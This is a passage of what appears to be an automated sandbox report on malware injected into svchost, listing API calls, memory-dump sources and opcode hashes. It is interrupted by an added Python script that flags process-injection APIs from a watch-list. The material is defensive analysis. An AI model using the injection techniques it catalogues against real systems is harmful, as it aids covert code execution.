                                • Edges: 290->292, 290->293, 292->295, 292->296, 293->292, 295->296
                                APIs
                                • GetThreadContext.KERNELBASE(?,00000000), ref: 057A6B0E
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: ContextThread
                                • String ID: Ea`
                                • API String ID: 1591575202-4245709379
                                • Opcode ID: 373fafa6a883d9663dfd8abdb58fe1aab279750dd4c85a720e76f9c598ebd106
                                • Instruction ID: 884e641703c6d7e3d41e7c7025c16b9120c238eae83bbefa06aed786be2624c9
                                • Opcode Fuzzy Hash: 373fafa6a883d9663dfd8abdb58fe1aab279750dd4c85a720e76f9c598ebd106
                                • Instruction Fuzzy Hash: BE213871D042088FDB50CFAAC4847EEBBF4EF88314F14842AD519A7640CB78A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph
                                • Nodes: 300 = 8786cf0-8786cf2; 301 = 8786cfc-8786d38; 302 = 8786cf3-8786cf4; 303 = 8786ced-8786cef; 304 = 8786cf5-8786cfb; 305 = 8786d3a-8786d3d; 306 = 8786d40-8786d6f (LoadLibraryExW); 308 = 8786d78-8786d95; 309 = 8786d71-8786d77
                                • Edges: 300->301, 300->302, 301->305, 301->306, 302->303, 302->304, 303->300, 304->301, 305->306, 306->308, 306->309, 309->308
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,08786B71,00000800,00000000,00000000), ref: 08786D62
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: Ea`
                                • API String ID: 1029625771-4245709379
                                • Opcode ID: 3b3d8f066eaa711de329f83da09585742d64b2ce3dd294560db11c89ab938e46
                                • Instruction ID: f8f628b910ca80ee9dbc71dbcec01d651b7ff458e988fb1fb0832d12dea597fe
                                • Opcode Fuzzy Hash: 3b3d8f066eaa711de329f83da09585742d64b2ce3dd294560db11c89ab938e46
                                • Instruction Fuzzy Hash: F82168B5904248DFCF10DFAAD848ADEFBF4AB58310F14806ED415A7610C7B5A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph
                                • Nodes: 312 = 878f250-878f252; 313 = 878f25c-878f2d8 (VirtualProtect); 314 = 878f254-878f25b; 316 = 878f2da-878f2e0; 317 = 878f2e1-878f302
                                • Edges: 312->313, 312->314, 313->316, 313->317, 314->313, 316->317
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0878F2CB
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: Ea`
                                • API String ID: 544645111-4245709379
                                • Opcode ID: 1f9a5aa0e5b1986b5e4890abcd64fa08b0e6859e3c52c81be5b25ab7ee8af658
                                • Instruction ID: 3ad553eddf2449314dfada477ee930fdf10386530e855f2c00427df7dc9ac7b5
                                • Opcode Fuzzy Hash: 1f9a5aa0e5b1986b5e4890abcd64fa08b0e6859e3c52c81be5b25ab7ee8af658
                                • Instruction Fuzzy Hash: 69210675D006099FDB10DF9AD484BDEBBF4EB48320F14842AE868A7641D779A984CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0878F2CB
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: Ea`
                                • API String ID: 544645111-4245709379
                                • Opcode ID: 011ca8d363bde7dd10490718c6e391f4ae16f4d31a3bca64a892ac3f69c23746
                                • Instruction ID: e97f57a85f024f093636c37f93d19774cf57b8fd12fc1d56b9f96a2ae3f7874d
                                • Opcode Fuzzy Hash: 011ca8d363bde7dd10490718c6e391f4ae16f4d31a3bca64a892ac3f69c23746
                                • Instruction Fuzzy Hash: 4E2126B5D002099FCB10DF9AD484BDEFBF4FB48320F14842AE468A7640D778A984CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph
                                • Nodes: 319 = 87857e0-8786d38; 322 = 8786d3a-8786d3d; 323 = 8786d40-8786d6f (LoadLibraryExW); 324 = 8786d78-8786d95; 325 = 8786d71-8786d77
                                • Edges: 319->322, 319->323, 322->323, 323->324, 323->325, 325->324
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,08786B71,00000800,00000000,00000000), ref: 08786D62
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: Ea`
                                • API String ID: 1029625771-4245709379
                                • Opcode ID: 4d663c2f2a24228f7934ffea0d36954dee4512c4ec1f1b9469558f8b78c4d8f6
                                • Instruction ID: 965eed8ab29e00108b2c9532e8ec6c9ee49f6c78a36fe31b8668afafd26e19e9
                                • Opcode Fuzzy Hash: 4d663c2f2a24228f7934ffea0d36954dee4512c4ec1f1b9469558f8b78c4d8f6
                                • Instruction Fuzzy Hash: 7F1114B6904209DFCB10DF9AD448BDEFBF4EB58311F14842ED415A7600C775A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057A6E5E
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: Ea`
                                • API String ID: 4275171209-4245709379
                                • Opcode ID: a48f7c1afdc91264a79664591235d6be1189601663a216c5cd93dbe275e89d92
                                • Instruction ID: 77c8b4340574f87cf8ad901192dc9306bf8a27ce9e80e2af3189d4a4becaa91a
                                • Opcode Fuzzy Hash: a48f7c1afdc91264a79664591235d6be1189601663a216c5cd93dbe275e89d92
                                • Instruction Fuzzy Hash: B8116776D042488FCF10CFA9D844BEFBBF1AF88324F28841AE515A7650CB769954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057A6E5E
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: Ea`
                                • API String ID: 4275171209-4245709379
                                • Opcode ID: 20bd8c6e491d7d89a84fa5e4cc45fb4abc9951f0f5bde5e368ef360da5afb450
                                • Instruction ID: f63d6ee0d7ec8593d1bc4e5f1703e16f3ced282ef41e34d2d7476614213feaa8
                                • Opcode Fuzzy Hash: 20bd8c6e491d7d89a84fa5e4cc45fb4abc9951f0f5bde5e368ef360da5afb450
                                • Instruction Fuzzy Hash: 8A1167728042088FCB10CFAAD844BDFBBF5EF88324F148419E515A7250CB75A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,087868C3), ref: 08786AF6
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID: Ea`
                                • API String ID: 4139908857-4245709379
                                • Opcode ID: b2244e5f48671a8df16577d76b0aacdc25fe9ed29ea527471e74fa33686acfa6
                                • Instruction ID: f608c284dd82be55a1cf953a9e92d4471f43ef26fb677dba6ea56a63e3f4321e
                                • Opcode Fuzzy Hash: b2244e5f48671a8df16577d76b0aacdc25fe9ed29ea527471e74fa33686acfa6
                                • Instruction Fuzzy Hash: E211F0B1C006499FCB10DF9AD448B9EBBF4EB88224F14842AD429B7600D779A545CFA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 057A79C5
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID: Ea`
                                • API String ID: 410705778-4245709379
                                • Opcode ID: 5b6b7804820694335a0214d04b8aca1d6a0c04780a62f2dc68857ea4aed19bde
                                • Instruction ID: 094e5f4b35b3b3b9c0dfb99edba466abdb0efcd60521101468528d2fcbb53470
                                • Opcode Fuzzy Hash: 5b6b7804820694335a0214d04b8aca1d6a0c04780a62f2dc68857ea4aed19bde
                                • Instruction Fuzzy Hash: 791103B58003489FDB50CF9AD489BDEBFF8EB98724F10851AE515A7700C375A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 057A79C5
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID: Ea`
                                • API String ID: 410705778-4245709379
                                • Opcode ID: ff1276ee667363f7dc0314915c72192feb9dd606a70f9a7fadd1748d8c50cb3b
                                • Instruction ID: ebf91fe677537d7da8ab47356fe7e3049ac223ac813026dec73e7255bd4bab06
                                • Opcode Fuzzy Hash: ff1276ee667363f7dc0314915c72192feb9dd606a70f9a7fadd1748d8c50cb3b
                                • Instruction Fuzzy Hash: 581106B58002498FDB20CF99D488BDEBBF4EB58324F14891AD425B7740C775A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%
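The function records above (DuplicateHandle, GetThreadContext, VirtualAllocEx, VirtualProtect, LoadLibraryExW, GetModuleHandleW, PostMessageW) come from two non-PE memory dumps inside svchost, which is the pattern an analyst triages for injected, unpacked code. The following script is an added example and is not part of the Joe Sandbox report: it parses the "APIs" / "Memory Dump Source" record layout used on this page, groups the referenced APIs per memory dump, flags dumps that reference cross-process injection primitives, and names the window message in the PostMessageW call (0x10 is WM_CLOSE). The sample lines are constructed copies of records on this page, the injection watch-list is an assumption of the example, and the `ref_rva` field (call-site address minus dump offset) is a derived value, not something the report prints.

```python
"""Parse Joe Sandbox function-record "APIs" lines and flag injection primitives.

Added example, not part of the Joe Sandbox report. The sample lines below are
constructed to mirror the record layout on this page (a few records only).
"""
import re
from collections import defaultdict

SAMPLE_RECORDS = """
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,08780476,?,?,?,?,?), ref: 08780537
Memory Dump Source
• Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
APIs
• GetThreadContext.KERNELBASE(?,00000000), ref: 057A6B0E
Memory Dump Source
• Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 0878F2CB
Memory Dump Source
• Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057A6E5E
Memory Dump Source
• Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 057A79C5
Memory Dump Source
• Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
"""

API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(
    r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$")

# Cross-process injection primitives: an assumed watch-list, not from the report.
INJECTION_APIS = {"VirtualAllocEx", "WriteProcessMemory", "GetThreadContext",
                  "SetThreadContext", "ResumeThread", "NtUnmapViewOfSection",
                  "CreateRemoteThread", "NtWriteVirtualMemory"}

# Window-message constants (winuser.h) for decoding PostMessageW's second argument.
WINDOW_MESSAGES = {0x0002: "WM_DESTROY", 0x0010: "WM_CLOSE", 0x0012: "WM_QUIT"}


def parse_records(text):
    """Pair each '• Api.Module(args), ref: X' line with the following Memory Dump Source."""
    records, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            d = m.groupdict()
            d["args"] = d["args"].split(",")
            pending.append(d)
            continue
        m = SRC_RE.match(line)
        if m and pending:
            for call in pending:
                call["dump"] = m.group("file")
                call["dump_offset"] = int(m.group("offset"), 16)
                call["dump_is_pe"] = m.group("pe") == "true"
                # Call-site address relative to the start of the dumped region (derived).
                call["ref_rva"] = int(call["ref"], 16) - call["dump_offset"]
                records.append(call)
            pending = []
    return records


def apis_by_dump(records):
    """Map each memory dump to the set of APIs referenced from it."""
    out = defaultdict(set)
    for r in records:
        out[r["dump"]].add(r["api"])
    return dict(out)


def injection_hits(records):
    """Return {dump: sorted injection APIs} for dumps that hit the watch-list."""
    hits = {}
    for dump, apis in apis_by_dump(records).items():
        found = sorted(apis & INJECTION_APIS)
        if found:
            hits[dump] = found
    return hits


def decode_post_message(record):
    """For PostMessageW/A records, name the message constant when it is known."""
    if not record["api"].startswith("PostMessage"):
        return None
    try:
        msg = int(record["args"][1], 16)
    except (IndexError, ValueError):
        return None
    return WINDOW_MESSAGES.get(msg, hex(msg))


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for dump, apis in injection_hits(recs).items():
        print(f"{dump}: {', '.join(apis)}")
    for r in recs:
        name = decode_post_message(r)
        if name:
            print(f"PostMessage at {r['ref']} -> {name}")
```

Run against the sample, only the 057A0000 dump is flagged (GetThreadContext plus VirtualAllocEx), while the 08780000 dump's VirtualProtect and DuplicateHandle stay below the threshold because they are in-process operations; in triage that split is what tells you which region holds the injector and which holds the runtime stub.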

                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: 20c82652bb56f410406fba5de21b9c3d0b303efbb3b528052f65b8a9e5d1b7f7
                                • Instruction ID: 10e47806e5bf3d315a65a7eaab170f353a7be9095fd49d6884d2c66d5201186d
                                • Opcode Fuzzy Hash: 20c82652bb56f410406fba5de21b9c3d0b303efbb3b528052f65b8a9e5d1b7f7
                                • Instruction Fuzzy Hash: CB616634A00A069FCB14CF59D4C08AAFBFAFF88310B55C969C91A9B715DB34F955CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: P@2l
                                • API String ID: 0-866591868
                                • Opcode ID: e92d4b04351208193e48f7ae274e092722071e00ccc7c21556247d3662879d88
                                • Instruction ID: 2d99c25b56fdd689a15d9168e6bf310b20db6ca7364086c68f1af4cdfa1d33d1
                                • Opcode Fuzzy Hash: e92d4b04351208193e48f7ae274e092722071e00ccc7c21556247d3662879d88
                                • Instruction Fuzzy Hash: FE21A031B041198FDB19AB74D0146AEB7F7BB89640F188969D406EB394DF74CD02CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8cbd28a39818e942642591755b544b6c53c7996fcf23dcc2965423ef0641004a
                                • Instruction ID: 4664cd09795d1992152fb8680ffe1f13123045f92c65df40ba4ef12309eb9603
                                • Opcode Fuzzy Hash: 8cbd28a39818e942642591755b544b6c53c7996fcf23dcc2965423ef0641004a
                                • Instruction Fuzzy Hash: F9F14E75B001049FDB19DF68D844E59BBE2FF88314B19C0A9E60A9B372DB36DC21DB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 513c43d16995c61d2baabda1034086a49a46ce5a1c8fce92303e18e38ac21a2e
                                • Instruction ID: 44f56881dfa2a9e176f3b8427e9841263e134892ef8f6013104cbe15121d2a90
                                • Opcode Fuzzy Hash: 513c43d16995c61d2baabda1034086a49a46ce5a1c8fce92303e18e38ac21a2e
                                • Instruction Fuzzy Hash: CCE14C75B001049FCB19DF68D854E59BBE2FF88314B19C0A9E60A9B372DB36DC21DB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b57281a9f8be160ab0916a5d7a5acca0b3bec6355c3b8c29c6a07f5955b3b348
                                • Instruction ID: 210153c7aff19b73252de77afac5d52bebb0b928a7155932cae3a51c1674b5e5
                                • Opcode Fuzzy Hash: b57281a9f8be160ab0916a5d7a5acca0b3bec6355c3b8c29c6a07f5955b3b348
                                • Instruction Fuzzy Hash: 7FA13A746006029FCB58EF24D584959BBF2FF89224755CA98D64ADB371DB30FC85CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8242dfad4492bef9644d5cba68fcc90cc7f47ab2b494437c228e0c0befd2c0c3
                                • Instruction ID: 2e80486c382830fe866d54c0a77c048f3d9b0611dd3651325b6f3b930b333ade
                                • Opcode Fuzzy Hash: 8242dfad4492bef9644d5cba68fcc90cc7f47ab2b494437c228e0c0befd2c0c3
                                • Instruction Fuzzy Hash: A1617D74B002159FDB18EF66D85866EBBF7FF88600F148429E906D73A4DF398D418BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b319938b82856e6d47742b9ad5db0f68e8f88828c112ff54d2675c968b542842
                                • Instruction ID: 0b6fc07de4ff04e9bed6a7424970983eaf1d32c47eca8ccc8a53bb37de0c578f
                                • Opcode Fuzzy Hash: b319938b82856e6d47742b9ad5db0f68e8f88828c112ff54d2675c968b542842
                                • Instruction Fuzzy Hash: C1718135A081119BAB18EB70F5445AD77E2FF9422071ACA9EC586AF364EF34AD0487E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 86eeb1644def7f50e4e7a01045f07b49fcff1dcba249936795b0c428f7356d32
                                • Instruction ID: 6e218c2ac0c66877cd991b72de9c6031f1ab265580e7eb6253ccc158bd39ed66
                                • Opcode Fuzzy Hash: 86eeb1644def7f50e4e7a01045f07b49fcff1dcba249936795b0c428f7356d32
                                • Instruction Fuzzy Hash: F7619E3160460A8FCB14DF58D4809AEFBF6FF84224B29C959D559DB211DB71EC46CBE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 666e8261716a9bca8cd7a44dd3edebac7d0b0e64436c5eeb61e5be69ebe86f6e
                                • Instruction ID: bdeae55f0fa7854d21afa69ac707f3b9d298ed8e97d16fd24149ced43b72af55
                                • Opcode Fuzzy Hash: 666e8261716a9bca8cd7a44dd3edebac7d0b0e64436c5eeb61e5be69ebe86f6e
                                • Instruction Fuzzy Hash: 6C511632B056108FC725DB65E88096BB7EAEFC561071AC87ED50AD7351CB31EC028790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 30a036474c6ac1e930b4b899bdaf63078f9d6baf327317f4982fc977199db3d1
                                • Instruction ID: b178dd77eec5ea598a98abaecc361cd286abf69e2bbf9bc49a829cc47238ac26
                                • Opcode Fuzzy Hash: 30a036474c6ac1e930b4b899bdaf63078f9d6baf327317f4982fc977199db3d1
                                • Instruction Fuzzy Hash: 88414D342006019FD758EB34E458A6A77E3FFD9614B28CE6CD2478B760DF71AC468BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5a538d27c31b4e48304feb35be99d61b91dbc659940b59b4afbab89dfdea1653
                                • Instruction ID: 13b4cbd09b5ea31c5d7faf114ef7e06192fbcad64452b5a00551e0f63aa1da6f
                                • Opcode Fuzzy Hash: 5a538d27c31b4e48304feb35be99d61b91dbc659940b59b4afbab89dfdea1653
                                • Instruction Fuzzy Hash: C6419130200B015FD368EF21D544B5AB7E2FF85224FA9CE9DC2569F6A1CF70B8098B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b4ac7dbbbc2390ca1269f67e9da9ce31974675eb321b302cdd2b872e01234bf
                                • Instruction ID: 1cea2fa981b54b6b19803d9da122d14ed742c66f25ed984dedcc52d5588b6f21
                                • Opcode Fuzzy Hash: 2b4ac7dbbbc2390ca1269f67e9da9ce31974675eb321b302cdd2b872e01234bf
                                • Instruction Fuzzy Hash: F7316E34B101149FCB18DFA9C498AADBBF6AF8D714F258169E506DB7A0CBB4DC01CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c7bde63339e8d20a456f2d34f12fea16193babddd668dea62ddf5fcb2ea597a8
                                • Instruction ID: 7f666edc6d41bc8464103137e97510f1536d07d918a8b452bc3b3c6402a635ac
                                • Opcode Fuzzy Hash: c7bde63339e8d20a456f2d34f12fea16193babddd668dea62ddf5fcb2ea597a8
                                • Instruction Fuzzy Hash: C431A071B002184FCB089BBA88506BF77BBEBC9610F69806DE50AD3355DF799D029791
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a01a1686d880cf6d8907e362eeabfabb90347301073fcbd6001ba5724b1daf23
                                • Instruction ID: 439e1eeb22c250499d547dd4f21339592dcd66e367b1e6507c40d5dfd40d609d
                                • Opcode Fuzzy Hash: a01a1686d880cf6d8907e362eeabfabb90347301073fcbd6001ba5724b1daf23
                                • Instruction Fuzzy Hash: DA315E30B101149FCB14DFA9C498A6DBBF6AF8D714F1581A9E506DB761CBB0DC01CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01763b064a59556dbb962ef230a61c53a9081319095c7b188dd4ec6543291b31
                                • Instruction ID: 8be6c36b24d32e9f51b05af74d5f350e503739a04e002f64b4ae7dc5355f542f
                                • Opcode Fuzzy Hash: 01763b064a59556dbb962ef230a61c53a9081319095c7b188dd4ec6543291b31
                                • Instruction Fuzzy Hash: 7F212C347006015BE718BA71A854B7E22D3EBD1624F1DCD2DD602AB294DF71AC4A57E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.803658156.0000000001B5D000.00000040.00000001.sdmp, Offset: 01B5D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_1b5d000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2917a37f6e82234af75eaa2660ff904ab7af4e5ef35c6f972cdb1ea20f88098b
                                • Instruction ID: f6394993755e0f134aceb23d3ad319e439cdf44bb376b7d12efad6f0fa229823
                                • Opcode Fuzzy Hash: 2917a37f6e82234af75eaa2660ff904ab7af4e5ef35c6f972cdb1ea20f88098b
                                • Instruction Fuzzy Hash: 15212271604204DFDB49CFA5D8C0B26BBA5FB84714F24CBADED094B346C336D846CA61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 157242c2d35519a8842e2c92e8d8863c78848c6a5c8a695042affb65d0af6f35
                                • Instruction ID: cb4e5bfc983d9199de53d8cf6e54977fb37dbd9277ac9e4d63ec2e410b2b3a88
                                • Opcode Fuzzy Hash: 157242c2d35519a8842e2c92e8d8863c78848c6a5c8a695042affb65d0af6f35
                                • Instruction Fuzzy Hash: 6611E7352046458FC710DB18D480C66FBEAAF453A4729CEAAE45AC7752D730FC46C791
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3294c5e098798065ce29242c5eac8139c7641e437b828ec15f840bc5dd7eb2b7
